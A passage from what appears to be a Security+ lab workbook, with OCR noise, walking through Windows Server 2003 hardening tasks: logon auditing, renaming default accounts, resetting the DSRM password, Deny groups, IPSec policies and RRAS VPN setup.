Default Domain Controllers Policy
2/ This setting will ensure that you never miss an auditing event by actually
ING shutting down the server, in this case the domain controller, if the security

log gets full. Because this GPO is linked to the Domain Controllers OU, this
setting will kill the domain controller(s) if their security log fills.

1. In the Audit Account Logon Policy, expand the GPO to view Computer Configuration »
Windows Settings » Security Settings » Local Policies » Security Options.

‘i1 Group Policy Object Editor 0] x|
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2. Double-click on Audit: Shut Down System Immediately If Unable To Log Security Audits.
3. Set this policy setting to Enabled. Click OK.

=101
Wiew  Help
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4. Close the GPO by clicking the X in the upper-right corner. Click Close in the Domain
Controllers Properties dialog box.

This policy should be effective within 5 minutes of closing the property
A TE pages for the GPO.

5. Close ADUC.

Monitoring the Security Logs for Account Logon Events

1. Launch Event Viewer by selecting Start » Run. In the Open field, type EVENTVWR
and click OK.

2. In the left pane of Event Viewer, select Security. This presents the log of all Security events.
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3. In the left pane of Event Viewer, right-click Security and select Properties. Select the

Filter tab.
An indication of a successful logon event is Event ID 673 -TGT Granted. An
TE indication of a failed logon event is Event ID 675 — Failed Logon for XP or
2003 clients, or Event ID 681 - Failed Logon for non-XP or 2003 clients.
Event descriptions and ID numbers were redesigned beginning with
TE Windows Vista and Server 2008.

4. Clear the selections for event types of Information, Warning, and Error, and in the
Event ID field, enter the first of the account logon event IDs—673—and click Apply.

General Filter I
Ewent types
[~ Infomation ¥ Sucoess audit
[~ waming ¥ Failure audit
[ Erar
Exent source: I[A\I] j
Ewent ID: |573
User: I
Computer. I
Erom: | First Event =7 82006 ][ 523198 =
Too  JLastEvent | N =
BRestore Defaults |
’D—KI Cancel | Apply |

5. Review any events that match this filter. This event indicates a successful logon.

6. In the Event ID field, enter the event ID 675 to review failed logons.

If no events match this event ID, 675, you may perform one or two logons

TE with an incorrect password to generate this event, and then log on
successfully. Launch Event Viewer and review the security log with this
filter configured.
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/4 You must reset these manually to display all events again. Check all five
@ING event types for Information, Warning, Error, Success Audit, and Failure
Audit and clear the Event ID field. Then click Apply.

7. After resetting the filter on the security log, click OK to close the properties and close
Event Viewer. You must either set the security log to Overwrite As Needed or you must
remember to turn the log on a regular basis. Turning the log means to save the open log
to a file for archival purposes, and then clear the events in the open log. This improves
the performance of the event viewer and can free up disk space on the boot disk.

Criteria for Completion

You have completed this task when you have modified the Default Domain Controller
GPO to audit success and failure of all domain account logons, configured and secured the
security event log, and ensured that you will never miss an account logon event. Also, you
should know how to filter and monitor these Account Logon events in Event Viewer.

Task 5.4: Securing the Default
User Accounts

During the installation of a Windows server or client operating system, two user accounts
are created by default: the Local Administrator and the Guest account. These accounts live
in the local accounts database (LAD) and remain there on XP, Vista, Windows 7, member
servers, and stand-alone servers.

As you run DCPromo on a server to create a new domain and become a domain
controller, the LAD is replaced with the AD database on that system. All accounts in the
LAD are destroyed. Two default domain accounts are created for this new domain and
they live in AD. These are the Administrator for the domain, and the Guest account for
the domain.

In addition to the AD database, a new LAD is created for Directory Services Restore
Mode (DSRM) and for Recovery Console login. Only one account lives in this LAD: the
Local Administrator, which is to be used solely for these two disaster-recovery purposes.

These accounts are built automatically and assigned these names—always. This makes
them an easy target for an attacker. These accounts must be secured to mitigate their
vulnerability.

You should already have a strong password policy in place. You should also have an
administrative policy that dictates that only a limited few, top-level administrators are
allowed to use the true Administrator account or reset the true Administrator password.
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Scenario

You are responsible for the security of your domain. You want to reduce the potential for
attack on user accounts and have decided to strengthen the default user accounts for the
domain and on several of your most critical servers.

Scope of Task

Duration
This task should take 20 minutes.

Setup

You will edit the default domain policy to rename the Local and Domain Administrator
and Guest accounts of all systems in the domain. Using this same GPO, you will disable the
local Guest account on all systems in the domain.

On the domain controller, you will reset the Directory Services Restore Mode (DSRM)
and Recovery Console Administrator logon password.

Caveat

Renaming the Administrator account on every system on the domain can cause services,
applications, drive mappings, printer mappings, and scheduled tasks to fail. You should
analyze this possibility before changing the Administrator account.

Resetting passwords can cause the loss of data. The forced reset of the password in
ADUC destroys access to all Encrypting File System (EFS) content by the user, all stored
passwords in Microsoft Internet Explorer, and all email that was encrypted by the user. If
you know the old password and can change the password for a user or have the user change
their password using the Change Password utility, this loss of access to content is eliminated.

Always use caution when modifying any GPO, and be sure you understand the
ramifications of your configuration, as well as where you have the GPO linked.

Procedure

You will implement a GPO at the domain level to rename the Local and Domain
Administrator and Guest accounts on all systems in the domain, and disable the Guest
account. You will create a decoy Administrator account with virtually no privileges. You
will then reset the password on the Local Administrator account (used for DSRM and
Recovery Console) on a domain controller to implement a standard, strong password.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

s Domain Administrator access
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Details
Managing the Default Users with the Default Domain Policy

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

3. Select the domain name. Right-click on the domain name and choose Properties. Select
the Group Policy tab.

Select the Default Domain Policy and click the Edit button.

5. Expand the GPO to view Computer Configuration » Windows Settings » Security
Settings » Local Policies » Security Options.
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6. In the right pane, double-click Accounts and rename it Administrator Account.

. Renaming the Administrator account on every system on the domain can
ING cause services, applications, drive and printer mappings, and scheduled
tasks to fail. Analyze this possibility before changing the Administrator
account. Renaming the Administrator account does not rename the DSRM
Administrator account on the domain controllers.

7. In the Define This Policy Setting field, type the new administrator account name:
TopDog. Click OK.
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Accounts: Rename administrator a 2=l

Secunty Policy Setting |

=

¥ Define this policy setting

Accounts: Rename admiristrator account

ITDpDUd

oK I Cancel | Apply |

8. In the right pane, double-click Accounts and rename it to Guest Account.

©

Click OK.
10. In the right pane, double-click Accounts and rename it to Guest Account Status.
11. Set the Define This Policy Setting option to Disabled. Click OK.

7/
ING

You may choose to disable the Administrator accounts on each local
system as well. The GPO has a setting for Accounts: Administrator account
status. This setting could be set to Disabled. However, you will not be

disabling the Administrator account in this exercise.

Disabling the Administrator account on every system on the domain can
cause services, applications, drive and printer mappings, and scheduled tasks
to fail. Analyze this possibility before disabling the Administrator account.

12. Confirm your settings in the GPO.

‘i Group Policy i

File:
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In the Define This Policy Setting field, type the new Guest account name: JoeBlow.
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Dewces: Prewent users from installing printer drivers Mot defined
Dewces: Restrict CO-ROM access to locally logged-on user only Mot defined
Dewces: Restrict floppy access ta locally logged-on user only Mot defined
B¥]Devices: Unsigned driver installation behavior Mot defined
[R8]Damain controller: Allow server operators to schedule tasks Hot defined
[R8]Damain controller: LDAP server signing requirements Mot defined
[88]Damain controller: Refuse machine account password changes Hot defined

P.!I Niernain member: Dinitalhe enceenk or sion sen e channel daka faliaes)

Mk defined T
»
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13. Close the GPO by clicking the X in the upper-right corner. Click Close in the

DomainName.com Properties dialog box.

This policy should be fully effective within 120 minutes of closing the
TE properties for the domain.

Creating a Decoy Domain Administrator Account

1. In ADUC, expand the domain name.
2. In the left pane, select the Users container.
3. In the right pane, select the Administrator user object.
4. Right-click on the Administrator user object and click Rename.
You have already changed the logon name to TopDog with the default
TE domain policy. This step changes the display name of the account to
match, and further obscures the Administrator account from the unaware
attacker.
5. Type in the new name—TopDog—and press Enter. You will receive a warning about
needing to log off immediately and log back on with the new credentials.
Active Directory : =
The object Administrator represents the currently logged-in user. Renaming this object will require the user to immediately log off and log on using the new user
name to avoid any access conflicks. Are you sure you want ko rename this object?
S Be sure you have saved all of your work and have closed all applications
ING except ADUC before proceeding.

6. After confirming that it is safe to log off the system, click Yes.

7.

8.

Complete the Rename User dialog box by filling in the new name for the Administrator
account: TopDog.

In the User Logon Name area, select the proper User Principal Name (UPN) from the

drop-down list. This usually matches the user’s email address and can be used as a
logon name. Click Next.
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12.
13.
14.
15.
16.

17.
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Full name: ITnpDng
First namne: I
Last narne: I
Display name: ITopDog

User logon name:

ITDpDog

User logon name [pre-windows 2000]
|MOBEER [TaeDog

Cancel |

Close all applications. Select Start » Log Off.

. Log on to the domain with the new username, TopDog (formerly Administrator), and

the appropriate password.

Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

Expand the domain. In the left pane, select the Users container.
Right-click on the Users container and select New > User.

In the First Name field, type Administrator.

In the User Logon Name field, type Administrator.

In the User Logon Name area, select the proper User Principal Name (UPN) from the
drop-down list. This usually matches the user’s email address and can be used as a
logon name. Click Next.

Type a strong password (the stronger, the better) in the Password and Confirm
Password fields.

Disable User Must Change Password At Next Logon, and enable the other three settings.

New Dhbject - User i x|

Q Create ir:  mobeer.com/Users

Password Iouuuu

Confirm password: Iouuuu

[ User must change password at nest logon
¥ User cannot change password
¥ Password never expires

V¥ Account is disabled

< Back I Next > I Cancel




Task 5.4: Securing the Default User Accounts 217

19. Click Next. Click Finish to create the decoy Administrator account.

20. Double-click on the TopDog user object. Highlight the information in the Description
field. Right-click the highlight and select Cut.

21. Close the TopDog Properties dialog box.

22. Double-click the decoy Administrator user object. Right-click in the Description field
and select Paste.

23. Close the decoy Administrator Properties dialog box.

This account could be placed in groups that have restrictive Deny
TE permissions to further reduce accesses from this account. The Deny
Domain Local Group process will be covered in Task 5.5.

Resetting the DSRM Administrator Password

1. You will need to run NTDSUTIL from a command window. Close all applications.
Select Start » Run, and type CMD.

In the command window, at the C:\ prompt, type NTDSUTIL and press Enter.
At the NTDSUTIL prompt, type HELP and press Enter. Observe the response:

? - Show this help

information
Authoritative restore - Authoritatively

restore the DIT database

Configurable Settings - Manage configurable settings
Domain management - Prepare for new domain creation
Files - Manage NTDS database files
Help - Show this help information
LDAP policies - Manage LDAP protocol policies
Metadata cleanup - Clean up objects of

decommissioned servers
Popups %s - (en/dis)able popups

with "on" or "off"
Quit - Quit the utility
Roles - Manage NTDS role owner tokens
Security account management - Manage Security

Account Database -
DupTlicate SID Cleanup
Semantic database analysis - Semantic Checker
Set DSRM Password - Reset directory
service restore mode
administrator account
password
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At the NTDSUTIL prompt, type Set DSRM Password and press Enter.

At the Reset DSRM Administrator Password prompt, type HELP and press Enter.
Observe the response:

? - Show this help information
Help - Show this help information
Quit - Return to the prior menu
Reset Password on server %s - Reset directory
service restore mode
administrator account
password on specified
domain controller. Use NULL
for local machine.
% You cannot use NTDSUTIL to reset this password if the target domain
TE controller is currently in Directory Service Restore mode.

6. To reset the DSRM Administrator password on the local domain controller, at the

Reset DSRM Administrator Password prompt, type Reset Password on Server NULL

and press Enter.

7. You will be prompted for the new DSRM Administrator password. Type the new
password Password1, and press Enter. The display screen should show the following;:

Please type password for DS Restore Mode Administrator Account:

Yo e e e 3% *

8. You will be prompted to confirm the new password. Type the password Password1,
and press Enter. The display screen should show the following:

e el

Please confirm new password:
You may receive a notice as shown here:

Because the local system doesn't support application password
validation, ntdsutil couldn't verify the password with the domain
policy. But ntdsutil will continue to set the password on DS
Restore Mode Administrator account.

You should see a success message:

Password has been set successfully.



Task 5.5: Implementing a Deny Group 219

)’ You could use this tool to reset the DSRM Administrator password on
AdTE remote domain controllers in the domain by specifying the fully qualified
domain name (FQDN) of each DC, as shown here: Reset Password on
Server rio.mobeer.com.

9. At the Reset DSRM Administrator Password prompt, type QUIT and press Enter.
10. At the NTDSUTIL prompt, type QUIT and press Enter.
11. Close the command window by typing EXIT and pressing Enter.

Criteria for Completion

You have completed this task when you have modified the Default Domain GPO to rename
the Administrator and Guest logon names, and have disabled the Guest accounts throughout
the entire domain, renamed the Administrator account, created a decoy administrator
account with no privileges, and then reset the DSRM.

Task 5.5: Implementing a Deny Group

It may be important to be able to lock a collection of users out of certain sensitive content.
This can be accomplished by building the chain of granting rights and permissions: The
User Account (A) gets added to the Global Group (G), the Global Group gets added to
the Domain Local Group (DL), and Permissions (P) get granted to the Domain Local
Group—AGDLP. In this case, you’ll be granting the NTFS Deny Full Control permission
to the Domain Local Group (DLG).

The Deny permission is all-powerful and overrules any collection of Allow permissions.

Scenario

You are responsible for the security of your information systems. You have a new folder
with sensitive content that should not be viewed by the Widget Production Department
personnel. You must implement security so that you are certain no member of the Widget
Production Department will ever get access to this content.

Scope of Task

Duration
This task should take 20 minutes.
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Setup

You have a new folder on the domain controller that contains sensitive content. You will
set the NTFS permissions on the content so that the Widget Production workers will never
gain access, even accidentally.

Caveat

Because the Deny permission is all-powerful and overrules any collection of Allow
permissions, as users change jobs in an organization through promotions and transfers,
their access requirements change. Being a member of a group with any Deny permissions
will overrule all Allow permissions granted by adding the user into other groups.

If a user continues to receive Access Denied errors, check for membership in any Deny
groups that may have been built.

Procedure

Using ADUC, you will build the Deny All GG and the Deny All DLG. You will then add the
production workers into the Deny All GG, place the Deny All GG into the Deny All DLG,
and then grant the NTFS Deny Full Control permissions to the Deny All DLG on a folder
containing sensitive content.

Equipment Used

For this task, you must have:

= Windows Server 2003 domain controller system
s Domain Administrator access

= Completion of Task 5.1: Creating User Accounts

Details
Building the Deny All AGDLP

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).

In the left pane, expand the domain and select the Widget Production OU.
Right-click on the Widget Production OU and select New » Group.

Name the new group Deny All GG, and select Global under Group Scope and Security
under Group Type. Click OK.
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New Object - Group

Deny Al GG

6. Right-click on the Widget Production OU and select New » Group.

7. Name the new group Deny All DLG, and select Domain Local under Group Scope and
Security under Group Type. Click OK.

New Object - Group

Deny Al DLS

8. Now you will add the users from the Widget Production OU into the Global Group.
Double-click on the Global Group named Deny All GG. On the Members tab, click Add.

9. Click Advanced.

Select Users, Contacts, Computers, or Groups
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10. Click Find Now to display all users and groups in the domain.

Select Users, Contacts, Computers, or Groups i llil

Select thiz object type:

Obiject Types.. |
From this location:
mobeer. com Locations. |

Common Queries I

Hame: IStalts with =] I el . |
D esCiption: IStalts with | I Find Now |
I Disabled acoounts Stap |

™ Mon expiing password

Davs since (st Iogom: 'I

&

ok Cancsl |

Mame [RDM) | EMailAddress | Description [ In Folder [

11. Select Prod1 through ProdS. To select all five users at once, you can click on Prod1, then
press and hold the Shift button on the keyboard and click on ProdS. Then click OK.

It doesn’t matter that these accounts are disabled from the earlier exercise.
TE They can still be managed regarding group membership.

12. Click OK a second time to add these users into the Widget Production GG.

General  Members I Member Elf| Managed Ey' Elb|ect| Securlty|
Mermbers:
Mame | Active Directary Folder ‘
ﬁ Pradi mobeer.comAwfidget Production
ﬁ Prodz mobeer.comAwfidget Production
ﬁ Prod3 mobeer.comAwfidget Production
ﬁ Prodd4 mobeer.comAwfidget Production
ﬁ Prod5 mobeer.comAwfidget Production

Add... Hemove |

oF. | Cancel | Apply |

13. In the Deny All GG Properties dialog box, select the Member Of tab.
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14. Add the Deny All GG into the Domain Local Group called Deny All DLG by first
clicking Add.

15. Click Advanced.
16. Click Find Now to display all users and groups in the domain.
17. Select the Deny All DLG. Then click OK.

Deny All GG Properties |

Genelal' Members  Member OF I Managed B_u' Dbiect' Seculityl

tdember of

Mame | Active Directory Falder |
Deny &Il DLG mobeer.comAvidget Production

Add... Remove |

Thig list displays only groups from the current domain and groups maintained
in the Global Catalog, such as universal groups.

ak. | Cancel | Apply |

18. Click OK a second time to add the Deny All GG into the Deny All DLG.
19. Click OK to close the Deny All GG Properties dialog box.

You have just assembled the AGL of the AGDLP chain for granting
TE permissions (Users into Deny All GG; Deny All GG into Deny All DLG).

Granting the NTFS Deny Permission

Next you will grant NTFS Deny Full Control permissions to the Deny All DLG. This will
disallow any access to the content by the members of the Deny All DLG.

1. Launch Explorer by right-clicking the Start button and selecting Explore.
2. In the left pane, select the root of a drive that holds the folder STUFF.

)’ If the STUFF folder does not exist, create a new folder named STUFF and
A TE copy a few files into it.
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3. In the right pane, right-click on the folder STUFF and select Properties. Select the
Security tab.

4% Active Directory Users and Computers E ;Iglil
@ File  Action Wiew Window Help |;|i|5|
s (A@mE iR XEDB R e Ta e
@ Active Directory Users and Computers | Users 31 objects
B Saved Queries Mame 7 [ Tvpe | Description =l
E @ [n&olbee.r..cam !ﬁIIS_WPG Security Group - Domain Local 115 Worker Process Group
@ ETIIIE:ITS € 1USR_EOEO User Eiuilt-in account for anony. ..
(2 Computers € 105k_RIO User Eiuilt-in account for anony. ..
(@) Damain Cantrallers € 1wam_BOBO User Euilt-in account for Inkern, ..
[ ForeignsecurityPrincipals € rwam_RIo User Euilt-in account for Inkern, ..
(€3] Hardened Servers ﬁkrbtgt User Key Distribution Center Se...
123 LostandFaund !ﬁRAS and IAS Servers Security Group - Domain Local Servers in this group can ...
(221 NTDS Quatas € rook User For linus access
(22 Program Data !ﬁs:hema Adrnins Security Group - Universal Designated administrators. ..
!ﬁsarvice Admins Security Group - Global
LT PORT_355945a0 User This is a wendor's accourt ...
i--{g3] Widge  Delegate Contral. ., etClients Security Group - Domain Local — Members of this group ha. .,
Find... Dog User Biuilt-in account For admini. .
V[ e Security Group - Domain Local Members who have view-. ..
&l Tasks 5 Contack Security Group - Domain Local W3SLS Administrators can ...
. - | @p User -
Creates a new ob View L InetOrgPersan | ‘

Mew Window From Here MSMQ Quets Alias

Refresh Printer

Expaort List. .. User
- sharedFolder

Propetties

Help

The Security tab is used to set NTFS permissions—that is, permissions

TE that control picking the files up off the NTFS volume.
Click Add.
Click Advanced.

Click Find Now to display all users and groups in the domain.

Select the Deny All DLG. Then click OK.

Click OK a second time to add the Deny All DLG into the access control list for the
STUFF folder.

9. With the Deny All DLG selected in the upper pane, check the Deny Full Control
permission in the lower pane. This collection of Deny All permissions denies any access
to the Deny All DLG at the NTFS level for this folder.

10. Click Apply. You will receive a security warning regarding the power of the Deny
permission. Review the warning and click Yes to continue.

® N o o a
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pecurity S

‘ou are setting a deny permissions entry. Deny entries take precedence ower allow entries. This means that if a user is a member of bwo groups, one
! that is allowed a permission and ancther that is denied the same permission, the user is denied that permission.

Do you wank to continue?
‘fes ) |

11. Click OK to close the STUFF Properties dialog box.

From this point forward, no matter what Allow permissions may be
TE granted through any other AGDLP chain, any member of the Deny All

A-G-DL-P chain will be denied access to the content in the STUFF folder.

Criteria for Completion

You have completed this task when you have built the AGDLP and have assigned Deny
Full Control permissions to the Deny All Domain Local Group on a folder with sensitive
content.
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Network security involves the protection of data as it travels
the wires of your private network, or even as it traverses the
public wires of the Internet. We’ll look at several techniques,
including encrypting data for file transfers and implementing security on wireless networks.

The virtual private network (VPN) is one of the most common approaches to securing
data as it flows over the network. There are many types of VPNs, and they vary in their
strength of authentication, encryption, and integrity validation. Generally speaking,
the stronger the authentication, encryption, and integrity validation, the greater the
overhead on the system and the poorer the performance of the data transmission.

A VPN is often referred to as a tunnel, since it creates a secure tunnel through the
nonsecure Internet.

VPN typically have three major components:

= An authentication mechanism (which may be one-way or mutual), such as the following:
= Passwords
= Kerberos

= SESAME (Secure European System for Applications in a Multivendor
Environment)

= Digital certificates (PKI)

= Anencryption algorithm (or standard), which provides confidentiality; examples
include the following:

= RC4
= DES
= 3DES
= AES

= An integrity-validation mechanism, which ensures that the data hasn’t been tampered with
and can provide nonrepudiation in the strongest forms; examples include the following:

=  MDS5

= SHAI1
= SHA2
= MAC
= MIC

= CCMP
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First you’ll look at deploying VPNs on a corporate network through the use of Group
Policy Objects (GPOs), and you’ll see how to take advantage of Active Directory to assist
with this process. Then you’ll look at building a point-to-point VPN from a VPN client to a
VPN server, as you would over the Internet. You’ll also explore performing secure, remote
administration and securely launching administrative tools.

The tasks in this phase map to Domains 2, 3, and 5 objectives for the
TE CompTIA Security+ exam (www.comptia.org/certifications/listed/

security.aspx).

Task 6.1: Deploying IPSec

Internet Protocol Security (IPSec) is currently one of the strongest VPN technologies
available. In its default configuration, it can be relatively easy to set up, but it is versatile
and can become quite complex. It is an open standard and can be adjusted to integrate with
your existing environment. The strength of the encryption, authentication, and integrity
validation can also be adjusted.

In the Microsoft implementation, an Active Directory environment currently running
on Windows Server 2000, 2003, or 2008 and Windows 2000, XP Professional, Windows
Vista, or Windows 7 uses Kerberos as the default configuration for authentication. For
integrity validation, the default settings for these operating systems use the Secure Hashing
Algorithm, 160 bit (referred to as SHA1). Windows 2000, 2003, and XP use three passes of
the Data Encryption Standard—referred to as 3DES or triple DES—for its data-encryption
algorithm. Windows Server 2008 and Windows Vista use AES-128 as their default data-
encryption algorithm. AES is the newer, stronger data-encryption standard that is
replacing 3DES.

If you need to improve system performance, you can implement a single pass of DES,
along with using Message Digest version 5 (MDS) for integrity validation. These are
weaker but less demanding of the resources on the system, thus resulting in better system
performance.

Scenario

You have several file servers that contain sensitive data. You must ensure that all
communications with these servers are implemented through a VPN.
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Scope of Task

Duration
This task should take 30 minutes.

Setup

You are an administrator in an Active Directory environment. You will configure a Secure
Server IPSec Policy GPO on the organizational unit (OU), which holds the file servers with
sensitive data. This policy will require that all communications to these servers be protected
with IPSec.

You must then implement a second Client Respond IPSec Policy GPO to enable IPSec for
the users. You will link this to an OU that holds the only clients authorized to access these
secure servers. [PSec isn’t available for users by default since it degrades the performance of
the systems.

Caveat

If the IPSec policy is implemented incorrectly, the entire network infrastructure can fail.
Do not implement the Secure Server IPSec Policy for any systems that provide network
infrastructure services, like domain controllers, DNS servers, WINS servers, or RRAS
servers. These services will fail. Implement the Secure Server IPSec Policy only on the select
few file servers holding sensitive data. You should also expect noticeable performance
degradation, due to the CPU horsepower required to perform the massive mathematical
calculations inside the encryption standard.

Procedure

For this task, you will produce a Secure Server IPSec Policy GPO that is linked to a new
OU called the Confidential Servers OU. You will then produce a Client Respond IPSec
Policy GPO that is linked to a new OU called the Confidential Clients OU.

Equipment Used
For this task, you must have:
= Windows Server 2003 domain controller system

s Domain Administrator access

Details
Creating the OU Infrastructure

1. Log on to the Windows Server 2003 domain controller system as the Domain
Administrator.

2. Select Start » Programs » Administration Tools » Active Directory Users And
Computers (ADUC).
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Expand the domain. Click on the domain name.
In the right pane, right-click and select New » Organizational Unit.

Name the new OU Confidential Servers. This OU would be populated with the
computer accounts for the file servers holding the sensitive data.

/4 Any systems placed in this OU will require IPSec for all communications.
ING If the system is providing any network infrastructure services, many of
these services will fail. Place in this OU servers that are providing file- and
printer-sharing services only.

6. Click on the domain name.
7. In the right pane, right-click and select New » Organizational Unit.
8. Name the new OU Confidential Clients.

This OU would be populated with the computer accounts for the client
TE systems that need to access the sensitive data.
. Any systems placed in this OU will experience performance degradation
ING when communicating with IPSec secure servers.

Building the Secure Server IPSec Policy GPO

1. Right-click on the Confidential Servers OU and select Properties. Select the Group
Policy tab.

Click the New button and name the new GPO IPSec Secure Servers Policy.
Click Edit to open the IPSec Secure Server GPO.

Expand Computer Configuration » Windows Settings » Security Settings, and select
IP Security Policies On Active Directory.

% Notice that none of the policies are currently assigned.
TE

5. In the right pane, right-click on Secure Server (Require Security), and select Assign.
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Group Policy Dbject r =] E3

File Action View Help

HEh 8
e |[AmXEFR| @B 14
3 IPSec Secure Server [Hio.mobeer.com] Policy || Name # | Description | Polic: Assigned |
EI-@ Computer Configuration Server [Request Security) For all IP traffic, always req... Mo
(] Software Settings Client (Respond Crily) Communicate normally (uns.., Ko

=] D windows Settings
=] Seripts (Startup)shutdawn)
Security Jettings
»
Account Policies Al Tasks

Assign

qL

Local Policies Delete
Event Log Eename
{_® Restricted Groups _
{28 system Services Properties
@ Reqistry Help
{28 Fille System
Y wireless hetwork (IEEE 502.11) Polides
- Public Key Policies
(23] Software Restriction Policies
A‘g 1P Security Policies on Active Direckory (m
=[] Administrative Templates
EI-Q User Configuration
(27 Software Settings

| - 71 Windows Settinas | _|;I
. »

6. Confirm that the policy is now assigned.

s
File  Action View Help
e B0 B2 2
_’:_j‘ IPSec Secure Server [rio.mobeer.com] Policy = me 4 | Description | Policy Assigned |
Bl @ Computer Configuration Server [Request Security) For all IP traffic, ahways req... o
[ Software Settings lient (Respond Only) Communicate normally {uns... ko
B D Windows Settings ecure Server (Require Security) For all IP traffic, ahways req...  Yes
| Seripts (Startup)Shutdawn)
Security Settings
Account Policies
-8 Local Policies
. Ewvent Log
{28 Restricted Groups
@ Syskem Services
@ Reqiskry
{28 Fille System
‘r ‘Wireless Metwork (IEEE 802,11 Policies
- Public key Policies
-] software Restriction Policies
.g 1P Security Policies on Active Directory {m
-] Administrative Templates |
B @ User Configuration
-] Software Settings
1 771 Windows Settinos |
|
2 Any Windows 2000 Server, 2000 Workstation, Server 2003, 2008, XP,
ING Vista, or Windows 7 system placed into this OU will require IPSec for all

communications that are initiated remotely.

7. Close the IPSec Secure Server Policy GPO. Click OK to close the Confidential Servers
Properties dialog box.
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Building the Client Respond IPSec Policy GPO

1. Right-click on the Confidential Clients OU and select Properties. Select the Group
Policy tab.

Click the New button and name the new GPO IPSec Client Respond Policy.
Click Edit to open the IPSec Client Respond GPO.

Expand Computer Configuration » Windows Settings » Security Settings, and select
IP Security Policies On Active Directory.

)’ Notice that none of the policies are currently assigned.
e

5. In the right pane, right-click on Client (Respond Only), and select Assign.

6. Confirm that the policy is now assigned.

2 Any Windows 2000 Server, 2000 Workstation, Server 2003, 2008, Server
ING 2008, XP, Vista, or Windows 7 system placed into this OU will implement
IPSec for all communications that are initiated locally to IPSec servers.
7. Close the IPSec Client Respond Policy GPO. Click OK to close the Confidential Clients

Properties dialog box.

Criteria for Completion

You have completed this task when you have created the OU for the servers and another one
for the clients. You must also have created and assigned the Secure Server IPSec Policy on
the server’s OU and the Client Respond IPSec Policy on the client’s OU.

Task 6.2: Configuring the VPN Server

As more and more employees telecommute to the office, VPN technology has become
increasingly important. A VPN server at the office enables secure communications for the
worker at home connecting to the office LAN over the public wires of the Internet.

There are many vendors of VPN server software and appliances, offering a wide
variety of strengths of authentication, encryption, and integrity validation. Any Microsoft
server-class operating system has the capability to be configured as a VPN server, securely
connecting the telecommuter to the corporate LAN as if they were directly connected to
the Ethernet cabling inside the office.
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The weaker—but often considered acceptable-strength—VPN implements Point-to-
Point Tunneling Protocol (PPTP), which is based on the RC4 encryption algorithm. This
is available only for Microsoft clients (Windows 95 and up), and uses standard Microsoft
authentication schemes (NTLM or NTLMv2).

The next step up in VPN strength is IPSec, which implements 3DES (or DES) for
encryption and SHA1 (or MDS) for integrity validation. Windows Server 2008 and
Windows Vista implement AES-128 and SHA1 for IPSec by default. Microsoft’s IPSec is
available only for Microsoft operating systems (Windows 2000 and up) and uses standard
Microsoft authentication schemes (Kerberos), but can be strengthened to
use digital certificates for authentication.

The third and strongest VPN from Microsoft is the combination of Layer 2 Tunneling
Protocol (L2TP) with IPSec. L2TP provides strong, mutual authentication based on
digital certificates on the VPN client and server computers. This authentication scheme is
so strong that a sender cannot deny sending the message. This is called nonrepudiation.
L2TP also provides strong integrity validation using Message Integrity Check (MIC).
Interestingly, L2TP does not provide data encryption. This is why you typically add IPSec
that does provide data encryption for confidentiality.

Remember that, generally speaking, the stronger the security (authentication,
encryption, and integrity validation), the poorer the performance on both the VPN server
and the VPN client. The mathematical calculations implemented by the encryption and
hashing algorithms and the increased complexity of authentication all take their toll on the
speed of the connection and data flow.

Scenario

You are the administrator of a Microsoft Windows Active Directory environment and have
workers who telecommute. You must configure a system to securely provide resources to
these workers who connect over the Internet.

You will build the VPN client and test the configuration in Task 6.3, “Configuring the
VPN Client.”

Scope of Task

Duration
This task should take 20 minutes.

Setup

You will initialize and configure the VPN server. On Windows Server 2003, the VPN is
configured in the Routing and Remote Access Services (RRAS) server.

Caveat

VPN servers are often connected to public networks, like the Internet. In other words,
these systems are exposed to the most hostile of environments and are subject to frequent
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attacks. Because of this public exposure, it is not uncommon that these systems become
compromised. These systems should be hardened and dedicated-purpose servers. Don’t run
anything more on these systems than is absolutely required.

Procedure

For this task, you will initialize and configure the RRAS server on a Windows Server 2003
server. You will configure the ports for inbound VPN connections.

You will also configure a user account with the privilege to connect to the server using
the RRAS service. VPN technology is an extension of dial-in services, originally utilizing
slow, analog modems over telephone lines. Users require the privilege to dial in to connect
to the VPN server. No user account is granted the dial-in privilege by default.

Equipment Used

For this task, you must have:

= Windows Server 2003 system

= Access to Active Directory Users And Computers (ADUC)

= Administrator access

Details

Initializing the VPN Services in RRAS

1. Log on to the Windows Server 2003 system as the Administrator.

2. Select Start » Programs » Administration Tools » Routing And Remote Access.
3. Ifthis is the first time you’ve used RRAS, the service will be stopped.

& Routing and Remate Access =] B
Fle Action View Help
les a@xsnl® |
B Routing and Remoate Access RIO (local)

tus =
el Configure the Routing and Remote
Access Server

To set up Routing and Remote Access, on the Action menu, dick
Configure and Enable Routing and Remate Access.

Far more information about setting up a Routing and Remate
fiocess, deployment scenarios, and troubleshooting, ses Helo.

Done.

4. In the left pane, select the server_name (local). Right-click and select Configure And
Enable Routing And Remote Access. Click Next in the RRAS Setup Wizard.
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5. Select Custom Configuration, and click Next.

Routing and Remote Access Server Setup Wizard

Configuration =
You can enable any of the following combinations of services. of you can i-l

customize this server,

" Remote access (dial-up or VPN)

Allow remote clients to connect to this server through either a dialup connection or &
secure Virual Private Network [VPN] Internet connection.

" Metwork address translation (NAT)
Allow internal clients to connect to the [ntemet using one public IP address.
™ Virtual Private Network [VPN) access and NAT

Allow remote clients to connect to this server through the Intemet and local clients to
connect to the Intemet using a single public IP address

(" Secure connection between bwo private networks
Connect this network to a remote network, such as a branch office.

Select any combination of the features available in Routing and Remaote Access

For mare information about these options, see Routing and Bemote Access Help.

< Back IWI Cancel I

6. On the Custom Configuration screen, select VPN Access and click Next, and then
click Finish.

Routing and Remote Access Server Setup Wizard

Custom Configuration o
‘when this wizard closes, pou can configure the selected services in the Routing
and Remote Access console.

Select the services that you want ko enable on this server,
IV WPN access

I Diakup access
I~ Demand-dial connections [ used for branch office routing |
™ NAT and basic firewal

[~ L&N routing

< Back I Mext = I Cancel

7. You will be prompted to start the RRAS Service. Click Yes.

8. Expand server_name (local) as necessary. Select Ports.
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Routing and Remote Acce =] 3
File Action Wiew Help
P | @
E Routing and Remote Access Ports
% Server Status Mame T | Device | Used B Status |
£ [ RIO {local) Wk Miniport (PPTP) (WPR4-99) VPN RASRouting  Inactive |
